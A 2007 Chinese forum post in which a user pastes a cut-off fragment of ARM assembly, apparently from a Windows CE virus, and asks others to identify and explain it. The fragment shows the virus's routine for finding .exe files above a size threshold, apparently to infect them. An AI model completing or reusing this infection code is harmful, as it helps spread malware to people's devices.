请问有人看的懂这个代码吗? 请高手的朋友赐教一二!!

prs123 2007-12-12 09:54:58
这个不知道是什么病毒的代码,请高手的朋友赐教一二!!
; for finding *.exe files in the current directory. But in this ; case I made a big mistake. I didn't realize that WinCE is not ; aware of the current directory and thus we need to use absolute ; pathnames. That's why this code won't find files in the current ; directory, but rather always in root directory. I found this out when I ; was performing final tests, but because the aim was to crea
adr r0, mask mov r1, r4 mov lr, pc ldr pc, [r11, #-24] ; find first file cmn r0, #1 beq free_wfd mov r5, r0 find_files_iterate ldr r0, [r4, #28] ; filesize high ldr r1, [r4, #32] ; filesize low cmp r0, #0 ; file too big? bne find_next_file cmp r1, #0x1000 ; file smaller than 4096 bytes? addgt r0, r4, #40 ; gimme file na



...全文
53 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

62,623

社区成员

发帖
与我相关
我的任务
社区描述
Java 2 Standard Edition
社区管理员
  • Java SE
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧